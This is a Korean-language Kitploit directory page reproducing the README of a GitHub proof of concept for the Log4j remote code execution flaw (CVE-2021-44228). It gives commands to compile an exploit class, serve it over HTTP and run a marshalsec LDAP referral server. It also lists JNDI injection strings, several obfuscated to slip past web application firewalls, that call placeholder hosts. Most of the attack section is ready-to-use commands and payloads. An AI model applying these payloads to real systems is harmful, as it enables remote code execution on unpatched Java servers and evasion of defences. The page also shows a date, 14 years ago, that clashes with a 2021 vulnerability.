Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Log4J_0day_RCE — Log4j-RCE (CVE-2021-44228) Proof of Concept | Kitploit
도구/GitHubGitHub/wysiiwyg/log4j_0day_rce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationWAF BypassPenetration Testing
GitHubwysiiwyg/log4j_0day_rce

Log4J_0day_RCE

Log4j-RCE (CVE-2021-44228) Proof of Concept

저장소 보기
14년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

커뮤니티 참여

Telegram

CVE-2021-44228(Apache Log4j Remote Code Execution)

영향 받는 버전 < 2.15.0

사용법:

root@kitploit:~
git clone https://github.com/PwnC00re/CVE-2021-44228-Apache-Log4j-Rce.git
cd apache-log4j-poc/src/main/java
javac Exploit.java 
python -m SimpleHTTPServer 8888 
root@kitploit:~
cd tools
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

마지막으로 프로젝트를 실행하면 로컬에서 계산기가 나타납니다.

팁:

JNDI-Injection-Exploit을 사용하여 익스플로잇할 수 있습니다.

rc1 우회

예를 들어:

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/ badClassName}

WAF 우회

root@kitploit:~
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

취약점 상세

룩업(Lookup)은 Log4j 구성의 임의 위치에 값을 추가하는 방법을 제공합니다.

Lookups

finally에서 누출을 일으키는 메서드

root@kitploit:~
LogManager.getLogger().error()
LogManager.getLogger().fatal()

간단한 확인 방법

블랙박스 테스트를 하려면, 수동 스캔을 권장합니다.

BurpLog4jScan

즐기세요!!! BurpLog4jScan.png

시간에 따른 스타게이저

Stargazers over time

도구 다운로드